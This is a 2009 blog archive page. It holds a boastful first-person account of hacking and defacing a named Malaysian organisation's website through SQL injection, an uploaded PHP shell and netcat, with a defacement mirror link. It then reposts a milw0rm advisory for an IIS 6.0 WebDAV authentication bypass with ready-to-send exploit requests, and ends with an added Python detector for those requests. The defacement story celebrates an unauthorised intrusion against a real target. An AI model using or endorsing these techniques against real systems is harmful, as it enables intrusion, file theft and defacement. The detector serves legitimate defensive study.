Archive for May 2009

Thieves are NATO…!!!

A while ago someone with the IP 124.82.126.219 [MALAYSIA - WILAYAH PERSEKUTUAN - KUALA LUMPUR - 3.167 101.7 - TM ADSL SERVICE PROVIDER MALAYSIA - GIDNET.COM] posted in my shout box, loudly writing “try hacking this site. http://perkim.net.my/admin/login.cfm”

WTF, I don't even know him and he has the nerve to order me to hack someone's site that has nothing to do with me. Since I didn't know him and had no business with that site, I just didn't care, then I posted “Who are you, daring to tell me to hack someone's site.. You're crap.. IDIOT” and went on with my office work, which was piling up T_T. A few hours later I checked my blog again, and it turned out that person had posted in my shoutbox again: “that's my link.. and you can't do it…. I'll give you this, the admin is named jizarul….. if you can hack it, you're great.” Damn.. I got even more annoyed with that person. He claimed to be the admin. Not long after, I checked the link he gave, full of curiosity: just how great is this site he built, that he boasts like that and challenges people to attack his site.

When I checked, it turned out the site uses ColdFusion, and the OS is Windows 2000 with IIS 5 installed. Checking further, it turned out it has a lot of bugs, from SQL Injection and Cross Site Scripting to problems with IIS itself. Since I still had a lot of work, I just left that web alone, I couldn't be bothered to work on that tacky web anyway. hihihihi.. He probably thinks he's great because he uses ColdFusion.. Eeek..

Then this afternoon, I don't know why, I suddenly remembered the arrogance of that admin who boasts and challenges people as he pleases. Since it was a day off, just for fun I started working on that web.. Damn… In just 10 minutes I had got the username + password of that web.. Damn, isn't there anything harder.. wkwkwkwk… I tried logging in, browsed here and there, and it turned out the site can upload files… damn… So I uploaded a php shell, and Wow.. it worked… hahahaha… Browsing around inside that server, I tried uploading netcat and it didn't work, then I tested again, I changed netcat's extension to *.txt and it worked… hahahaha… That person is really stupid…

That server is insanely slow, running netcat it just kept waiting… errrkk… I ran out of patience and finally just ended all this, and I finished by editing some of their files.. hahahaha… so tiring…

Pak cik, pak cik…
You can only just make a tacky web like that and you boast. Using ColdFusion doesn't guarantee that your web, pak cik, is 100% safe… Typical.. Proven again that those thieves can only boast… Say Fuck to those damn thieves….

Here's the screenshot…


Here's the link: http://www.perkim.net.my/index.htm
Here's the mirror: http://www.evilc0der.com/mirror/27728/

YaDoY666 Greets : | Jack | Gblack | Don Tukulesto | n0c0py | De-Quest |


Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope - May 12th, 2009

Affected Vendors : Microsoft
Affected Products : Web Server

Vulnerability Details

This vulnerability allows remote attackers to bypass access restrictions on
vulnerable installations of Internet Information Server 6.0. The specific flaw exists within the WebDAV
functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens when parsing the
URI and sending back data. Exploitation of this issue can result in the following:

* Authentication bypass of password protected folders
* Listing, downloading and uploading of files into a password protected WebDAV folder

Authentication bypass of password protected folders

Assume there is a password protected folder in "d:\inetpub\wwwroot\protected\".
The password protection mechanism is not relevant for the attack to work.
Inside this folder there is a file named „protected.zip“.
The attacker sends a HTTP GET request to the web server.

        GET /  %c0%af/protected/protected.zip HTTP/1.1
        Translate: f
        Connection: close
        Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode
character is removed in a WebDAV request. „Translate: f“ instructs the web server to
handle the request using WebDAV. Using this malicious URI construct the webserver
sends the file located at „/protected/protected.zip“ back to the attacker without asking for
proper authentication.

Another valid request an attacker might send to the web server is:

        GET /prot%c0%afected/protected.zip HTTP/1.1
        Translate: f
        Connection: close
        Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and
send back the password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is
enabled.

Listing files in a password protected WebDAV folder

The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files. The attacker sends a
PROPFIND request to the web server.

        PROPFIND /protec%c0%afted/ HTTP/1.1
        Host: servername
        User-Agent: neo/0.12.2
        Connection: TE
        TE: trailers
        Depth: 1
        Content-Length: 288
        Content-Type: application/xml

IIS responds with the directory listing of the folder without asking for a password.
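
For defenders, the pattern described above can be flagged in captured requests. The following is an added example, not part of the original advisory: it looks for overlong two-byte UTF-8 sequences such as %c0%af in the request target and raises the severity when the request is handled by WebDAV (a WebDAV method or a "Translate: f" header). The function names and the sample requests are constructed for illustration, and the check generalizes from %c0%af to any overlong two-byte sequence.

```python
import re

# Overlong two-byte UTF-8: lead byte 0xC0/0xC1 plus one continuation byte.
# %c0%af (overlong "/") is the sequence used in the advisory's requests.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)
# WebDAV methods from RFC 4918; "Translate: f" also routes a GET to WebDAV.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}


def parse_request(raw):
    """Return (method, target, headers) from a raw HTTP request head."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers


def classify(raw):
    """Return a finding dict for a suspicious request, or None if clean."""
    method, target, headers = parse_request(raw)
    hits = OVERLONG.findall(target)
    if not hits:
        return None
    webdav = method in WEBDAV_METHODS or headers.get("translate", "").lower() == "f"
    return {
        "severity": "high" if webdav else "medium",
        "sequences": [h.lower() for h in hits],
        # Path left once the sequence is dropped, as the advisory describes.
        "effective_path": OVERLONG.sub("", target),
    }


# Constructed sample requests modelled on the ones quoted in the advisory.
SAMPLES = [
    "GET /prot%c0%afected/protected.zip HTTP/1.1\r\nTranslate: f\r\nConnection: close\r\nHost: servername\r\n\r\n",
    "PROPFIND /protec%c0%afted/ HTTP/1.1\r\nHost: servername\r\nDepth: 1\r\n\r\n",
    "GET /prot%C0%AFected/protected.zip HTTP/1.1\r\nHost: servername\r\n\r\n",
    "GET /public/index.htm HTTP/1.1\r\nHost: servername\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample.split("\r\n", 1)[0], "->", classify(sample))
```

The "effective_path" field shows which protected resource the request resolves to once the sequence is removed, which helps when triaging web server logs against the list of password protected folders.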

Credit

This vulnerability was discovered by:
Nikolaos Rangos
Contact: kcope2@googlemail.com
Greetings to: alex and andi

# milw0rm.com [2009-05-15]